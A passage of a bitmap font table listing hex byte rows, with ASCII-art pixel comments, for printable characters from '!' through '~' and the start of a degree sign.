0x80, # O
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @16 '"' (4 pixels wide)
0x90, # O O
0x90, # O O
0x90, # O O
0x90, # O O
0x90, # O O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @32 '#' (11 pixels wide)
0x00, 0x00, #
0x08, 0x40, # O O
0x08, 0x40, # O O
0x10, 0x80, # O O
0x7F, 0xE0, # OOOOOOOOOO
0x10, 0x80, # O O
0x10, 0x80, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0xFF, 0xC0, # OOOOOOOOOO
0x21, 0x00, # O O
0x42, 0x00, # O O
0x42, 0x00, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @64 '$' (7 pixels wide)
0x00, #
0x10, # O
0x10, # O
0x7C, # OOOOO
0x92, # O O O
0x90, # O O
0x90, # O O
0x70, # OOO
0x1C, # OOO
0x12, # O O
0x12, # O O
0x92, # O O O
0x7C, # OOOOO
0x10, # O
0x10, # O
0x10, # O
# @80 '%' (14 pixels wide)
0x00, 0x00, #
0x78, 0x20, # OOOO O
0x84, 0x40, # O O O
0x84, 0x40, # O O O
0x84, 0x80, # O O O
0x85, 0x00, # O O O
0x85, 0x78, # O O O OOOO
0x7A, 0x84, # OOOO O O O
0x02, 0x84, # O O O
0x04, 0x84, # O O O
0x08, 0x84, # O O O
0x08, 0x84, # O O O
0x10, 0x78, # O OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @112 '&' (10 pixels wide)
0x00, 0x00, #
0x3C, 0x00, # OOOO
0x42, 0x00, # O O
0x42, 0x00, # O O
0x42, 0x00, # O O
0x24, 0x00, # O O
0x38, 0x80, # OOO O
0x48, 0x80, # O O O
0x84, 0x80, # O O O
0x83, 0x00, # O OO
0x81, 0x00, # O O
0x42, 0x80, # O O O
0x3C, 0x40, # OOOO O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @144 ''' (1 pixel wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @160 '(' (4 pixels wide)
0x10, # O
0x20, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x20, # O
0x10, # O
# @176 ')' (4 pixels wide)
0x80, # O
0x40, # O
0x20, # O
0x20, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x80, # O
# @192 '*' (7 pixels wide)
0x10, # O
0x92, # O O O
0x54, # O O O
0x38, # OOO
0x54, # O O O
0x92, # O O O
0x10, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @208 '+' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0xFF, 0x80, # OOOOOOOOO
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @240 ',' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
# @256 '-' (5 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @272 '.' (1 pixel wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @288 '/' (6 pixels wide)
0x04, # O
0x04, # O
0x08, # O
0x08, # O
0x08, # O
0x10, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x20, # O
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
# @304 '0' (8 pixels wide)
0x00, #
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @320 '1' (5 pixels wide)
0x00, #
0x20, # O
0x20, # O
0xE0, # OOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
# @336 '2' (7 pixels wide)
0x00, #
0x78, # OOOO
0x84, # O O
0x02, # O
0x02, # O
0x02, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x40, # O
0x80, # O
0xFE, # OOOOOOO
0x00, #
0x00, #
0x00, #
# @352 '3' (7 pixels wide)
0x00, #
0x78, # OOOO
0x84, # O O
0x02, # O
0x02, # O
0x04, # O
0x38, # OOO
0x04, # O
0x02, # O
0x02, # O
0x02, # O
0x84, # O O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
# @368 '4' (8 pixels wide)
0x00, #
0x02, # O
0x06, # OO
0x0A, # O O
0x12, # O O
0x22, # O O
0x42, # O O
0x82, # O O
0xFF, # OOOOOOOO
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x00, #
0x00, #
0x00, #
# @384 '5' (7 pixels wide)
0x00, #
0xFE, # OOOOOOO
0x80, # O
0x80, # O
0x80, # O
0xF8, # OOOOO
0x04, # O
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x84, # O O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
# @400 '6' (8 pixels wide)
0x00, #
0x1E, # OOOO
0x20, # O
0x40, # O
0x80, # O
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @416 '7' (7 pixels wide)
0x00, #
0xFE, # OOOOOOO
0x02, # O
0x04, # O
0x04, # O
0x08, # O
0x08, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x40, # O
0x00, #
0x00, #
0x00, #
# @432 '8' (8 pixels wide)
0x00, #
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @448 '9' (8 pixels wide)
0x00, #
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x01, # O
0x02, # O
0x04, # O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
# @464 ':' (1 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @480 ';' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x40, # O
0x40, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
# @496 '<' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x01, # O
0x06, # OO
0x18, # OO
0x60, # OO
0x80, # O
0x60, # OO
0x18, # OO
0x06, # OO
0x01, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @512 '=' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0x80, # OOOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0x80, # OOOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @544 '>' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x80, # O
0x60, # OO
0x18, # OO
0x06, # OO
0x01, # O
0x06, # OO
0x18, # OO
0x60, # OO
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @560 '?' (6 pixels wide)
0x00, #
0x70, # OOO
0x88, # O O
0x04, # O
0x04, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x20, # O
0x00, #
0x20, # O
0x20, # O
0x00, #
0x00, #
0x00, #
# @576 '@' (13 pixels wide)
0x00, 0x00, #
0x0F, 0x80, # OOOOO
0x30, 0x60, # OO OO
0x40, 0x10, # O O
0x47, 0xD0, # O OOOOO O
0x88, 0x48, # O O O O
0x90, 0x48, # O O O O
0x90, 0x48, # O O O O
0x90, 0x48, # O O O O
0x90, 0x48, # O O O O
0x88, 0xC8, # O O OO O
0x47, 0x70, # O OOO OOO
0x40, 0x00, # O
0x30, 0x00, # OO
0x0F, 0x80, # OOOOO
0x00, 0x00, #
# @608 'A' (10 pixels wide)
0x00, 0x00, #
0x0C, 0x00, # OO
0x12, 0x00, # O O
0x12, 0x00, # O O
0x12, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x7F, 0x80, # OOOOOOOO
0x40, 0x80, # O O
0x40, 0x80, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @640 'B' (8 pixels wide)
0x00, #
0xFC, # OOOOOO
0x82, # O O
0x82, # O O
0x82, # O O
0x84, # O O
0xFC, # OOOOOO
0x82, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x82, # O O
0xFC, # OOOOOO
0x00, #
0x00, #
0x00, #
# @656 'C' (9 pixels wide)
0x00, 0x00, #
0x1F, 0x00, # OOOOO
0x60, 0x80, # OO O
0x40, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x40, 0x00, # O
0x60, 0x80, # OO O
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @688 'D' (10 pixels wide)
0x00, 0x00, #
0xFC, 0x00, # OOOOOO
0x83, 0x00, # O OO
0x80, 0x80, # O O
0x80, 0x80, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x80, # O O
0x80, 0x80, # O O
0x83, 0x00, # O OO
0xFC, 0x00, # OOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @720 'E' (8 pixels wide)
0x00, #
0xFF, # OOOOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xFF, # OOOOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xFF, # OOOOOOOO
0x00, #
0x00, #
0x00, #
# @736 'F' (7 pixels wide)
0x00, #
0xFE, # OOOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xFE, # OOOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @752 'G' (10 pixels wide)
0x00, 0x00, #
0x1F, 0x80, # OOOOOO
0x60, 0x40, # OO O
0x40, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x87, 0xC0, # O OOOOO
0x80, 0x40, # O O
0x80, 0x40, # O O
0x40, 0x40, # O O
0x60, 0x40, # OO O
0x1F, 0x80, # OOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @784 'H' (10 pixels wide)
0x00, 0x00, #
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0xFF, 0xC0, # OOOOOOOOOO
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @816 'I' (3 pixels wide)
0x00, #
0xE0, # OOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
# @832 'J' (6 pixels wide)
0x00, #
0x3C, # OOOO
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
# @848 'K' (8 pixels wide)
0x00, #
0x81, # O O
0x82, # O O
0x84, # O O
0x88, # O O
0x90, # O O
0xA0, # O O
0xE0, # OOO
0x90, # O O
0x88, # O O
0x84, # O O
0x82, # O O
0x81, # O O
0x00, #
0x00, #
0x00, #
# @864 'L' (7 pixels wide)
0x00, #
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xFE, # OOOOOOO
0x00, #
0x00, #
0x00, #
# @880 'M' (11 pixels wide)
0x00, 0x00, #
0xC0, 0x60, # OO OO
0xC0, 0x60, # OO OO
0xA0, 0xA0, # O O O O
0xA0, 0xA0, # O O O O
0x91, 0x20, # O O O O
0x91, 0x20, # O O O O
0x8A, 0x20, # O O O O
0x8A, 0x20, # O O O O
0x84, 0x20, # O O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @912 'N' (10 pixels wide)
0x00, 0x00, #
0x80, 0x40, # O O
0xC0, 0x40, # OO O
0xA0, 0x40, # O O O
0x90, 0x40, # O O O
0x90, 0x40, # O O O
0x88, 0x40, # O O O
0x84, 0x40, # O O O
0x82, 0x40, # O O O
0x82, 0x40, # O O O
0x81, 0x40, # O O O
0x80, 0xC0, # O OO
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @944 'O' (11 pixels wide)
0x00, 0x00, #
0x1F, 0x00, # OOOOO
0x60, 0xC0, # OO OO
0x40, 0x40, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x40, 0x40, # O O
0x60, 0xC0, # OO OO
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @976 'P' (8 pixels wide)
0x00, #
0xFC, # OOOOOO
0x82, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x82, # O O
0xFC, # OOOOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @992 'Q' (11 pixels wide)
0x00, 0x00, #
0x1F, 0x00, # OOOOO
0x60, 0xC0, # OO OO
0x40, 0x40, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x40, 0x40, # O O
0x60, 0xC0, # OO OO
0x1F, 0x00, # OOOOO
0x02, 0x00, # O
0x02, 0x00, # O
0x01, 0xE0, # OOOO
# @1024 'R' (9 pixels wide)
0x00, 0x00, #
0xFC, 0x00, # OOOOOO
0x82, 0x00, # O O
0x82, 0x00, # O O
0x82, 0x00, # O O
0x82, 0x00, # O O
0x84, 0x00, # O O
0xF8, 0x00, # OOOOO
0x88, 0x00, # O O
0x84, 0x00, # O O
0x82, 0x00, # O O
0x81, 0x00, # O O
0x80, 0x80, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1056 'S' (8 pixels wide)
0x00, #
0x3E, # OOOOO
0x41, # O O
0x80, # O
0x80, # O
0x80, # O
0x70, # OOO
0x0E, # OOO
0x01, # O
0x01, # O
0x01, # O
0x82, # O O
0x7C, # OOOOO
0x00, #
0x00, #
0x00, #
# @1072 'T' (9 pixels wide)
0x00, 0x00, #
0xFF, 0x80, # OOOOOOOOO
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1104 'U' (10 pixels wide)
0x00, 0x00, #
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x80, 0x40, # O O
0x40, 0x80, # O O
0x3F, 0x00, # OOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1136 'V' (9 pixels wide)
0x00, 0x00, #
0x80, 0x80, # O O
0x80, 0x80, # O O
0x41, 0x00, # O O
0x41, 0x00, # O O
0x41, 0x00, # O O
0x22, 0x00, # O O
0x22, 0x00, # O O
0x22, 0x00, # O O
0x14, 0x00, # O O
0x14, 0x00, # O O
0x14, 0x00, # O O
0x08, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1168 'W' (13 pixels wide)
0x00, 0x00, #
0x82, 0x08, # O O O
0x85, 0x08, # O O O O
0x45, 0x10, # O O O O
0x45, 0x10, # O O O O
0x45, 0x10, # O O O O
0x45, 0x10, # O O O O
0x48, 0x90, # O O O O
0x28, 0xA0, # O O O O
0x28, 0xA0, # O O O O
0x28, 0xA0, # O O O O
0x30, 0x60, # OO OO
0x10, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1200 'X' (8 pixels wide)
0x00, #
0x81, # O O
0x42, # O O
0x42, # O O
0x24, # O O
0x18, # OO
0x18, # OO
0x18, # OO
0x18, # OO
0x24, # O O
0x42, # O O
0x42, # O O
0x81, # O O
0x00, #
0x00, #
0x00, #
# @1216 'Y' (9 pixels wide)
0x00, 0x00, #
0x80, 0x80, # O O
0x41, 0x00, # O O
0x41, 0x00, # O O
0x22, 0x00, # O O
0x14, 0x00, # O O
0x14, 0x00, # O O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1248 'Z' (8 pixels wide)
0x00, #
0xFF, # OOOOOOOO
0x01, # O
0x02, # O
0x04, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x80, # O
0xFF, # OOOOOOOO
0x00, #
0x00, #
0x00, #
# @1264 '[' (4 pixels wide)
0xF0, # OOOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xF0, # OOOO
# @1280 '\' (6 pixels wide)
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x40, # O
0x20, # O
0x20, # O
0x20, # O
0x10, # O
0x10, # O
0x10, # O
0x08, # O
0x08, # O
0x08, # O
0x04, # O
0x04, # O
# @1296 ']' (4 pixels wide)
0xF0, # OOOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0xF0, # OOOO
# @1312 '^' (10 pixels wide)
0x00, 0x00, #
0x0C, 0x00, # OO
0x12, 0x00, # O O
0x12, 0x00, # O O
0x21, 0x00, # O O
0x40, 0x80, # O O
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1344 '_' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0x80, # OOOOOOOOO
0x00, 0x00, #
# @1376 '`' (2 pixels wide)
0x80, # O
0x80, # O
0x40, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1392 'a' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x3C, # OOOO
0x42, # O O
0x02, # O
0x3E, # OOOOO
0x42, # O O
0x82, # O O
0x82, # O O
0x86, # O OO
0x7A, # OOOO O
0x00, #
0x00, #
0x00, #
# @1408 'b' (8 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x82, # O O
0xFC, # OOOOOO
0x00, #
0x00, #
0x00, #
# @1424 'c' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x38, # OOO
0x44, # O O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x44, # O O
0x38, # OOO
0x00, #
0x00, #
0x00, #
# @1440 'd' (8 pixels wide)
0x01, # O
0x01, # O
0x01, # O
0x01, # O
0x3F, # OOOOOO
0x41, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x00, #
0x00, #
0x00, #
# @1456 'e' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x38, # OOO
0x44, # O O
0x82, # O O
0x82, # O O
0xFE, # OOOOOOO
0x80, # O
0x80, # O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @1472 'f' (5 pixels wide)
0x38, # OOO
0x40, # O
0x40, # O
0x40, # O
0xF0, # OOOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x00, #
0x00, #
0x00, #
# @1488 'g' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x3F, # OOOOOO
0x41, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x01, # O
0x42, # O O
0x3C, # OOOO
# @1504 'h' (8 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x00, #
0x00, #
0x00, #
# @1520 'i' (1 pixel wide)
0x00, #
0x80, # O
0x80, # O
0x00, #
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @1536 'j' (4 pixels wide)
0x00, #
0x10, # O
0x10, # O
0x00, #
0x70, # OOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0xE0, # OOO
# @1552 'k' (7 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x84, # O O
0x88, # O O
0x90, # O O
0xA0, # O O
0xE0, # OOO
0x90, # O O
0x88, # O O
0x84, # O O
0x82, # O O
0x00, #
0x00, #
0x00, #
# @1568 'l' (1 pixel wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @1584 'm' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xB9, 0xC0, # O OOO OOO
0xC6, 0x20, # OO OO O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1616 'n' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x00, #
0x00, #
0x00, #
# @1632 'o' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @1648 'p' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x82, # O O
0xFC, # OOOOOO
0x80, # O
0x80, # O
0x80, # O
# @1664 'q' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x3F, # OOOOOO
0x41, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x01, # O
0x01, # O
0x01, # O
# @1680 'r' (5 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0xB8, # O OOO
0xC0, # OO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @1696 's' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x78, # OOOO
0x84, # O O
0x80, # O
0x80, # O
0x78, # OOOO
0x04, # O
0x04, # O
0x84, # O O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
# @1712 't' (5 pixels wide)
0x00, #
0x40, # O
0x40, # O
0x40, # O
0xF8, # OOOOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x38, # OOO
0x00, #
0x00, #
0x00, #
# @1728 'u' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x00, #
0x00, #
0x00, #
# @1744 'v' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x82, # O O
0x82, # O O
0x44, # O O
0x44, # O O
0x44, # O O
0x28, # O O
0x28, # O O
0x10, # O
0x10, # O
0x00, #
0x00, #
0x00, #
# @1760 'w' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x4A, 0x40, # O O O O
0x4A, 0x40, # O O O O
0x4A, 0x40, # O O O O
0x51, 0x40, # O O O O
0x31, 0x80, # OO OO
0x20, 0x80, # O O
0x20, 0x80, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1792 'x' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x82, # O O
0x44, # O O
0x28, # O O
0x28, # O O
0x10, # O
0x28, # O O
0x28, # O O
0x44, # O O
0x82, # O O
0x00, #
0x00, #
0x00, #
# @1808 'y' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x82, # O O
0x82, # O O
0x44, # O O
0x44, # O O
0x44, # O O
0x28, # O O
0x28, # O O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x20, # O
# @1824 'z' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0xFC, # OOOOOO
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x80, # O
0xFC, # OOOOOO
0x00, #
0x00, #
0x00, #
# @1840 '{' (7 pixels wide)
0x0E, # OOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x20, # O
0xC0, # OO
0x20, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x0E, # OOO
# @1856 '|' (1 pixel wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
# @1872 '}' (7 pixels wide)
0xE0, # OOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x08, # O
0x06, # OO
0x08, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0xE0, # OOO
# @1888 '~' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x30, 0x40, # OO O
0x48, 0x40, # O O O
0x84, 0x80, # O O O
0x83, 0x00, # O OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1920 '°' (6 pixels wide)
0x00, #
0x78, # OOOO
0x84, # O O
0x84, # O O
